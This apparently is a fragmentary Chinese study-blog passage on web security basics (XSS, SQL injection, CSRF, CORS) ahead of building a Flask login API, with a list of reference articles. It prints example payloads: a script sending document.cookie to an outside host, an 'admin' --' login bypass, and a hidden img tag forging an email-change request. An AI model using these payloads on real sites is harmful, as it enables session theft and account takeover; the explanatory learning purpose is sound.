<script>document.location='http://abc.com/api/cookies?cookie='+document.cookie;</script>
admin' --
# 並將其拼接到查詢中:
SELECT * FROM users WHERE username='admin' -- ' AND password='[whatever user entered]'
<img src="http://target-website.com/change-email?email=attacker@example.com" width="0" height="0">
React 如何防範 XSS
Flask 如何防範 SQL 注入
Flask 如何防範 CSRF
CORS (Cross-Origin Resource Sharing):
https://www.example.com:80
。<img>、<script>或<form>
等HTML元素所發起的請求。沒想到光是整理這些內容就花了大半天的時間,但總算讓我對於基本的資訊安全有了那麼一點認識。
當然實際上的攻防還有非常非常多的細節,但這就只能慢慢學了。
最重要的還是需要將這些內容應用到實作上。
只是因為還有其他任務要進行,所以明天再來開始來實作 Login API 吧!
讓我們來談談 CSRF
CSRF 攻擊原理. CSRF是一種常見的網路攻擊手法,全名是 Cross Site Request… | by 單細胞 | Medium
什麼是 XSS 攻擊?如何防範?|ExplainThis
JWT Locations — flask-jwt-extended 4.5.2 documentation
[Day 27] Cross-Origin Resource Sharing (CORS) - iT 邦幫忙::一起幫忙解決難題,拯救 IT 人的一天
資安這條路 10 - [跨站腳本漏洞] Store XSS , Relate XSS , DOM XSS - iT 邦幫忙::一起幫忙解決難題,拯救 IT 人的一天